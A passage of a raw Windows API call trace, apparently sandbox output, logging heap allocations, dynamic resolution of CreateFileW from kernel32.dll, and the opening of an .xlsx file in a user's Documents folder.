0x43cf860 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0078.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0078.727] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0078.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0078.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0078.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0078.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0078.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0078.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0078.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0078.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0078.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0078.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0078.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0078.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0078.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0078.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0078.730] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0078.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0078.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0078.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0078.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0078.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0078.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0078.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0078.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0078.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0078.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0078.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0078.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0078.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0078.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0078.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0078.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0078.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0078.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.733] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0078.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0078.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0078.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cad48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0078.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0078.733] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0078.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0078.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0078.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0078.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0078.735] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\6O-EvMa xQmykruQi.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\6o-evma xqmykruqi.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0078.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431da28 [0078.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0078.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0078.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0078.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0078.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0078.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0078.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0078.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0078.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0078.737] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: 